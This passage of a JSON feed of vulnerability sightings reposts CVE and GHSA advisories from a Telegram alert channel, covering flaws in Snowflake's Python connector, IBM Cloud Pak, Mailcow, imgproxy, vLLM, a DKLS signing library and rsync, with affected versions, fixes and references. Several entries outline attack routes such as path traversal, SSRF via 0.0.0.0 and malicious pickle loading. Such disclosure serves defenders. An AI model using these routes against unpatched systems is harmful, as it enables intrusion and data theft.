"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R2X6-CJG7-8R43", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3399", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-r2x6-cjg7-8r43\n\ud83d\udd25 CVSS Score: 4.3 (CVSS_V3)\n\ud83d\udd39 Description: ### Issue\nSnowflake discovered and remediated a vulnerability in the Snowflake Connector for Python. On Linux systems, when temporary credential caching is enabled, the Snowflake Connector for Python will cache temporary credentials locally in a world-readable file.\n\nThis vulnerability affects versions 2.3.7 through 3.13.0. Snowflake fixed the issue in version 3.13.1.\n\n### Vulnerability Details\nOn Linux, when either EXTERNALBROWSER or USERNAME_PASSWORD_MFA authentication methods are used with temporary credential caching enabled, the Snowflake Connector for Python will cache the temporary credentials in a local file. In the vulnerable versions of the Driver, this file is created with world-readable permissions.\n\n### Solution\nSnowflake released version 3.13.1 of the Snowflake Connector for Python, which fixes this issue. We recommend users upgrade to version 3.13.1.\n\n### Additional Information\nIf you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).\n\ud83d\udccf Published: 2025-01-29T20:49:59Z\n\ud83d\udccf Modified: 2025-01-29T20:49:59Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/snowflake-connector-python/security/advisories/GHSA-r2x6-cjg7-8r43\n2. https://github.com/snowflakedb/snowflake-connector-python\n3. https://github.com/snowflakedb/snowflake-connector-python/releases/tag/v3.13.1", "creation_timestamp": "2025-01-29T21:11:09.000000Z"}, {"uuid": "46f69b3c-83ff-4e64-bd8d-a1be5da39760", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J7VF-Q996-69XM", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-j7vf-q996-69xm\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n\ud83d\udd39 Description: IBM Cloud Pak System 2.3.3.6, 2.3.3.6 iFix1, 2.3.3.6 iFix2, 2.3.3.7, 2.3.3.7 iFix1, and 2.3.4.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2023-38012\n2. https://www.ibm.com/support/pages/node/7148474", "creation_timestamp": "2025-01-25T17:06:15.000000Z"}, {"uuid": "091d7abe-1a7c-435d-9d4d-fed498d0d862", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JFX2-4JJ8-X2WJ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3099", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-jfx2-4jj8-x2wj\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\n\ud83d\udd39 Description: IBM Cloud Pak System 2.3.3.0, 2.3.3.3, 2.3.3.3 iFix1, 2.3.3.4, 2.3.3.5, 2.3.3.6, 2.3.3.6 iFix1, 2.3.3.6 iFix2, 2.3.3.7, and 2.3.3.7 iFix1\u00a0could allow an authenticated user to obtain sensitive information from log files.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2023-38271\n2. https://www.ibm.com/support/pages/node/7159533", "creation_timestamp": "2025-01-25T17:06:15.000000Z"}, {"uuid": "b9cc369d-a953-4ea4-b1e5-a0931d2cbce6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X4QV-H94M-PW9J", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3092", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-x4qv-h94m-pw9j\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n\ud83d\udd39 Description: IBM Analytics Content Hub 2.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-35134\n2. https://www.ibm.com/support/pages/node/7172787", "creation_timestamp": "2025-01-25T17:06:06.000000Z"}, {"uuid": "aad5b753-80b8-4fa3-9027-3cbe0909b2e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VQRH-582C-2W2R", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3094", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-vqrh-582c-2w2r\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n\ud83d\udd39 Description: IBM Cloud Pak System 2.3.3.0, 2.3.3.3, 2.3.3.3 iFix1, 2.3.3.4, 2.3.3.5, 2.3.3.6, 2.3.3.6 iFix1, 2.3.3.6 iFix2, 2.3.3.7, and 2.3.3.7 iFix1\u00a0could disclose sensitive information about the system that could aid in further attacks against the system.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2023-38713\n2. https://www.ibm.com/support/pages/node/7159533", "creation_timestamp": "2025-01-25T17:06:08.000000Z"}, {"uuid": "25547faf-b546-4e32-8e8b-bd3b9af5be15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-23C8-4WWR-G3C6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3331", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56529\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Mailcow through 2024-11b has a session fixation vulnerability in the web panel. It allows remote attackers to set a session identifier when HSTS is disabled on a victim's browser. After a user logs in, they are authenticated and the session identifier is valid. Then, a remote attacker can access the victim's web panel with the same session identifier.\n\ud83d\udccf Published: 2025-01-29T00:31:54Z\n\ud83d\udccf Modified: 2025-01-29T00:31:54Z\n\ud83d\udd17 References:\n1. https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-23c8-4wwr-g3c6\n2. https://nvd.nist.gov/vuln/detail/CVE-2024-56529", "creation_timestamp": "2025-01-29T01:10:14.000000Z"}, {"uuid": "8005684f-0e3b-40f9-8ff0-cd6e0f07e1cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3XG3-CGVQ-2XWR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3382", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24374\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: When using the `??` operator, output escaping was missing for the expression on the left side of the operator.\n\n\ud83d\udccf Published: 2025-01-29T18:41:43Z\n\ud83d\udccf Modified: 2025-01-29T18:41:43Z\n\ud83d\udd17 References:\n1. https://github.com/twigphp/Twig/security/advisories/GHSA-3xg3-cgvq-2xwr\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-24374\n3. https://github.com/twigphp/Twig/commit/38576b12f05df3cc871bf68f39ccb46b418334a3\n4. https://github.com/twigphp/Twig", "creation_timestamp": "2025-01-29T19:11:19.000000Z"}, {"uuid": "cea82188-7624-4225-82d4-0b64bbdd5ab3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-86CX-HCFC-8MM8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5341", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25192\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: GLPI is a free asset and IT management software package. Prior to version 10.0.18, a low privileged user can enable debug mode and access sensitive information. Version 10.0.18 contains a patch. As a workaround, one may delete the `install/update.php` file.\n\ud83d\udccf Published: 2025-02-25T17:58:20.388Z\n\ud83d\udccf Modified: 2025-02-25T17:58:20.388Z\n\ud83d\udd17 References:\n1. https://github.com/glpi-project/glpi/security/advisories/GHSA-86cx-hcfc-8mm8\n2. https://github.com/glpi-project/glpi/releases/tag/10.0.18", "creation_timestamp": "2025-02-25T18:22:35.000000Z"}, {"uuid": "6152ca2d-0ff4-40df-a635-892c0ede6b18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HCR5-WV4P-H2G2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3400", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-hcr5-wv4p-h2g2\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: ### Impact\nIf the \"full-elastic-stack\" example vector configuration was used for a real cluster, the previous values of kubernetes secrets would have been disclosed in the audit messages.\n\n### Patches\nThe example has been updated to fix this in commit db1aa5b867256b0a7bf206544c6981ab068b73dc\n\n\n### Workarounds\nReplace \n```yaml\n\n          if .request.requestKind.kind == \"Secret\" {\n            del(.request.object.data)\n            .request.object.data.redacted = \"REDACTED\"\n            del(.request.oldObject.data)\n            .request.oldObject.data.redacted = \"REDACTED\"\n          }\n```\nIn the vector \"audit-files-json-parser-and-redaction\" step\nwith\n```yaml\n\n          if .request.requestKind.kind == \"Secret\" {\n            # Redact the secret data\n            del(.request.object.data)\n            .request.object.data.redacted = \"REDACTED\"\n            del(.request.oldObject.data)\n            .request.oldObject.data.redacted = \"REDACTED\"\n            # Remove the previously set secret data - Not bothering to parse it as this annotation shouldn't ever be needed\n            del(.request.object.metadata.annotations.[\"kubectl.kubernetes.io/last-applied-configuration\"])\n            del(.request.oldObject.metadata.annotations.[\"kubectl.kubernetes.io/last-applied-configuration\"])\n          }\n```\n\ud83d\udccf Published: 2025-01-29T20:47:51Z\n\ud83d\udccf Modified: 2025-01-29T20:47:51Z\n\ud83d\udd17 References:\n1. https://github.com/RichardoC/kube-audit-rest/security/advisories/GHSA-hcr5-wv4p-h2g2\n2. https://github.com/RichardoC/kube-audit-rest/commit/db1aa5b867256b0a7bf206544c6981ab068b73dc\n3. https://github.com/RichardoC/kube-audit-rest", "creation_timestamp": "2025-01-29T21:11:10.000000Z"}, {"uuid": "e4daa515-81e2-41e9-ab4a-6cc18f03de66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J2HP-6M75-V4J4", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3180", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-j2hp-6m75-v4j4\n\ud83d\udd25 CVSS Score: 5.3 (CVSS_V3)\n\ud83d\udd39 Description: ### Summary\n\nImgproxy does not block the `0.0.0.0` address, even with `IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES` set to false. This can expose services on the local host.\n\n### Details\n\nimgproxy protects against SSRF against a loopback address with the following check ([source](https://github.com/imgproxy/imgproxy/blob/0f37d62fd8326a32c213b30dd52e2319770885d8/security/source.go#L43C1-L47C1)):\n\n```\nif !config.AllowLoopbackSourceAddresses &amp;&amp; ip.IsLoopback() {\n return ErrSourceAddressNotAllowed\n}\n```\n\nThis check is insufficient to prevent accessing services on the local host, as services may receive traffic on `0.0.0.0`. Go's `IsLoopback` ([source](https://github.com/golang/go/blob/40b3c0e58a0ae8dec4684a009bf3806769e0fc41/src/net/ip.go#L126-L131)) strictly follows the definition of loopback IPs beginning with `127`. `0.0.0.0` is not blocked.\n\ud83d\udccf Published: 2025-01-27T20:50:21Z\n\ud83d\udccf Modified: 2025-01-27T20:50:21Z\n\ud83d\udd17 References:\n1. https://github.com/imgproxy/imgproxy/security/advisories/GHSA-j2hp-6m75-v4j4\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-24354\n3. https://github.com/imgproxy/imgproxy/commit/3d4fed6842aa8930ec224d0ad75b0079b858e081\n4. https://github.com/imgproxy/imgproxy", "creation_timestamp": "2025-01-27T21:08:26.000000Z"}, {"uuid": "83d90084-382f-4583-940c-a7aab4b8e2c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RH4J-5RHW-HR54", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3179", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-rh4j-5rhw-hr54\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: ### Description\nThe vllm/model_executor/weight_utils.py implements hf_model_weights_iterator to load the model checkpoint, which is downloaded from huggingface. It use torch.load function and weights_only parameter is default value False. There is a security warning on https://pytorch.org/docs/stable/generated/torch.load.html, when torch.load load a malicious pickle data it will execute arbitrary code during unpickling.\n\n### Impact\nThis vulnerability can be exploited to execute arbitrary codes and OS commands in the victim machine who fetch the pretrained repo remotely.\n\nNote that most models now use the safetensors format, which is not vulnerable to this issue.\n\n### References\n* https://pytorch.org/docs/stable/generated/torch.load.html\n* Fix: https://github.com/vllm-project/vllm/pull/12366\n\ud83d\udccf Published: 2025-01-27T20:50:30Z\n\ud83d\udccf Modified: 2025-01-27T20:50:30Z\n\ud83d\udd17 References:\n1. https://github.com/vllm-project/vllm/security/advisories/GHSA-rh4j-5rhw-hr54\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-24357\n3. https://github.com/vllm-project/vllm/pull/12366\n4. https://github.com/vllm-project/vllm/commit/d3d6bb13fb62da3234addf6574922a4ec0513d04\n5. https://github.com/vllm-project/vllm\n6. https://github.com/vllm-project/vllm/releases/tag/v0.7.0\n7. https://pytorch.org/docs/stable/generated/torch.load.html", "creation_timestamp": "2025-01-27T21:08:26.000000Z"}, {"uuid": "57279355-0b53-49b5-86cc-890638ae2c4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2V3R-GVQ5-QQGH", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3178", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-2v3r-gvq5-qqgh\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: A cross-site scripting (XSS) vulnerability in the Events/Agenda module of Dolibarr v21.0.0-beta allows attackers to execute arbitrary web scripts or HTMl via a crafted payload injected into the Title parameter.\n\ud83d\udccf Published: 2025-01-27T18:32:01Z\n\ud83d\udccf Modified: 2025-01-27T20:50:34Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-55227\n2. https://github.com/Dolibarr/dolibarr/commit/56710ce9b79a97df093f586c90bdaf6cce6a5808\n3. https://github.com/Dolibarr/dolibarr/commit/9aa24d9d9aeab36358c725dae3fe20c9631082e7\n4. https://github.com/Dolibarr/dolibarr/commit/c0250e4c9106b5c889e512a4771f0205d4f99b99\n5. https://gist.github.com/Dqtdqt/9762466cd6ec541ea265ba33b09489ff\n6. https://github.com/Dolibarr/dolibarr\n7. https://github.com/Dolibarr/dolibarr/security/policy", "creation_timestamp": "2025-01-27T21:08:25.000000Z"}, {"uuid": "10a2dda3-b12a-440c-8bbd-850bee4b5d65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G9GF-G5JQ-9H3V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3181", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-g9gf-g5jq-9h3v\n\ud83d\udd25 CVSS Score: 9.1 (CVSS_V3)\n\ud83d\udd39 Description: SSRF vulnerability in Edit Service Page of Apache Ranger UI in Apache Ranger Version 2.4.0.\nUsers are recommended to upgrade to version Apache Ranger 2.5.0, which fixes this issue.\n\ud83d\udccf Published: 2025-01-22T00:33:36Z\n\ud83d\udccf Modified: 2025-01-27T22:57:20Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-45479\n2. https://cwiki.apache.org/confluence/display/RANGER/Vulnerabilities+found+in+Ranger\n3. https://github.com/apache/ranger\n4. http://www.openwall.com/lists/oss-security/2025/01/21/4", "creation_timestamp": "2025-01-27T23:08:27.000000Z"}, {"uuid": "68ecd123-52bc-411c-af95-0a266ed44b01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CRHP-7C74-CG4C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3256", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: PYSEC-2023-278\n\ud83d\udd25 CVSS Score: 5.3 (CVSS_V3)\n\ud83d\udd39 Description: MindsDB connects artificial intelligence models to real time data. Versions prior to 23.11.4.1 contain a limited file write vulnerability in `file.py` Users should use MindsDB's `staging` branch or v23.11.4.1, which contain a fix for the issue.\n\ud83d\udccf Published: 2023-12-11T21:15:00Z\n\ud83d\udccf Modified: 2025-01-28T14:22:17.737111Z\n\ud83d\udd17 References:\n1. https://github.com/mindsdb/mindsdb/security/advisories/GHSA-crhp-7c74-cg4c\n2. https://github.com/mindsdb/mindsdb/commit/8d13c9c28ebcf3b36509eb679378004d4648d8fe", "creation_timestamp": "2025-01-28T14:58:28.000000Z"}, {"uuid": "c7b747fe-1ffc-468a-9e3e-7056f10a6d1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7F6P-PHW2-8253", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3264", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-7f6p-phw2-8253\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Coinbase researchers reported 2 security issues in our implementation of the oblivious transfer (OT) based protocol [DKLS](https://eprint.iacr.org/2018/499.pdf):\n\n### 1. Secret share recovery attack\n\nIf the base OT setup of the protocol is reused for another execution of the OT extension, then a malicious participant can extract a bit of the secret of another participant. By repeating the execution they can eventually recover the whole secret.\n\nTherefore, unlike our comments suggested, you **must not reuse an OT setup** for multiple protocol executions. \n\nWe're adding a warning in the code:\n\nhttps://github.com/taurushq-io/multi-party-sig/blob/9e4400fccee89be6195d0a12dd0ed052288d5040/internal/ot/extended.go#L114\n\n### 2. Invalid security proof due to incorrect operator\n\nThe original 2018 version of the DKLS had a typo in the OT extension protocol when computing the check value in the OT extension: the paper noted a XOR whereas it should be a field multiplication. This erroneous behavior was implemented [in our code](https://github.com/taurushq-io/multi-party-sig/blob/4d84aafb57b437da1b933db9a265fb7ce4e7c138/internal/ot/extended.go#L188). \n\nThe proof of security fails in this case. No concrete attack is known, however.\n\nThe [2023 update](https://eprint.iacr.org/2018/499.pdf) of the DKLS paper reported that typo and updated the protocol definition.\n\n~As of 20241124, patching is in progress (branch [otfix](https://github.com/taurushq-io/multi-party-sig/tree/otfix)), but not merged to the main branch yes as the tests fail to pass. We're troubleshooting the issue and will merge into the main branch when it's resolved.~\n\nAs of 20250128, a patched version is available in https://github.com/taurushq-io/multi-party-sig/releases/tag/v0.7.0-alpha-2025-01-28, thanks to https://github.com/taurushq-io/multi-party-sig/pull/119.\n\n### Workarounds\n\nDo not reuse an OT setup in the event that an abort is detected, to eliminate the secret recovery attack.\n  \n\n### Credits\n\nThanks to the Coinbase researchers Yi-Hsiu Chen and Samuel Ranellucci for discovering these issues and providing a comprehensive write-up. Thank you to Yehuda Lindell for coordinating the disclosure.\nThanks to Jay Prakash for clarifying the risk of the base setup reuse.\nThanks to @cronokirby for writing the corrected code.\n\n\n\n\ud83d\udccf Published: 2024-11-25T15:11:11Z\n\ud83d\udccf Modified: 2025-01-28T18:06:15Z\n\ud83d\udd17 References:\n1. https://github.com/taurushq-io/multi-party-sig/security/advisories/GHSA-7f6p-phw2-8253\n2. https://eprint.iacr.org/2018/499.pdf\n3. https://github.com/taurushq-io/multi-party-sig\n4. https://github.com/taurushq-io/multi-party-sig/blob/4d84aafb57b437da1b933db9a265fb7ce4e7c138/internal/ot/extended.go#L188\n5. https://github.com/taurushq-io/multi-party-sig/blob/9e4400fccee89be6195d0a12dd0ed052288d5040/internal/ot/extended.go#L114\n6. https://github.com/taurushq-io/multi-party-sig/tree/otfix", "creation_timestamp": "2025-01-28T18:10:48.000000Z"}, {"uuid": "90600515-4eaf-4d45-a507-7b8bc01eecc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8G4Q-XG66-9FP4", "type": "seen", "source": "https://t.me/RedPillDealer4833/171879", "content": "Yikes....\nhttps://github.com/advisories/GHSA-8g4q-xg66-9fp4", "creation_timestamp": "2024-10-09T18:02:10.000000Z"}, {"uuid": "0b90f264-f993-45fe-8031-d9b149fe363e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0774", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3368", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: A flaw was found in the rsync daemon which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T18:32:00Z\n\ud83d\udccf Modified: 2025-01-29T09:31:42Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12085\n2. https://access.redhat.com/errata/RHSA-2025:0324\n3. https://access.redhat.com/errata/RHSA-2025:0325\n4. https://access.redhat.com/errata/RHSA-2025:0637\n5. https://access.redhat.com/errata/RHSA-2025:0688\n6. https://access.redhat.com/errata/RHSA-2025:0714\n7. https://access.redhat.com/errata/RHSA-2025:0774\n8. https://access.redhat.com/errata/RHSA-2025:0787\n9. https://access.redhat.com/security/cve/CVE-2024-12085\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n11. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-01-29T10:10:09.000000Z"}, {"uuid": "17f7f34c-9af7-4f0d-9bca-fcd6e9d11ee2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1780", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3545", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd25 CVSS Score: 8.0 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T06:31:35Z\n\ud83d\udccf Modified: 2025-01-31T00:30:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1488\n2. https://access.redhat.com/errata/RHSA-2024:1750\n3. https://access.redhat.com/errata/RHSA-2024:1751\n4. https://access.redhat.com/errata/RHSA-2024:1780\n5. https://access.redhat.com/errata/RHSA-2024:1801\n6. https://access.redhat.com/errata/RHSA-2024:1802\n7. https://access.redhat.com/errata/RHSA-2024:1804\n8. https://access.redhat.com/errata/RHSA-2024:2587\n9. https://access.redhat.com/errata/RHSA-2024:2696\n10. https://access.redhat.com/errata/RHSA-2025:0837\n11. https://access.redhat.com/security/cve/CVE-2024-1488\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-31T01:12:29.000000Z"}, {"uuid": "198ed6f5-b947-4843-9c25-0fe4b86f52f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0324", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3368", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: A flaw was found in the rsync daemon which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T18:32:00Z\n\ud83d\udccf Modified: 2025-01-29T09:31:42Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12085\n2. https://access.redhat.com/errata/RHSA-2025:0324\n3. https://access.redhat.com/errata/RHSA-2025:0325\n4. https://access.redhat.com/errata/RHSA-2025:0637\n5. https://access.redhat.com/errata/RHSA-2025:0688\n6. https://access.redhat.com/errata/RHSA-2025:0714\n7. https://access.redhat.com/errata/RHSA-2025:0774\n8. https://access.redhat.com/errata/RHSA-2025:0787\n9. https://access.redhat.com/security/cve/CVE-2024-12085\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n11. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-01-29T10:10:09.000000Z"}, {"uuid": "9d74a2a2-ef1d-4a83-b414-647a7a3b5b23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0637", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3368", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: A flaw was found in the rsync daemon which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T18:32:00Z\n\ud83d\udccf Modified: 2025-01-29T09:31:42Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12085\n2. https://access.redhat.com/errata/RHSA-2025:0324\n3. https://access.redhat.com/errata/RHSA-2025:0325\n4. https://access.redhat.com/errata/RHSA-2025:0637\n5. https://access.redhat.com/errata/RHSA-2025:0688\n6. https://access.redhat.com/errata/RHSA-2025:0714\n7. https://access.redhat.com/errata/RHSA-2025:0774\n8. https://access.redhat.com/errata/RHSA-2025:0787\n9. https://access.redhat.com/security/cve/CVE-2024-12085\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n11. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-01-29T10:10:09.000000Z"}, {"uuid": "4e9c43be-2931-403b-a4e7-1ba9d7d0348b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 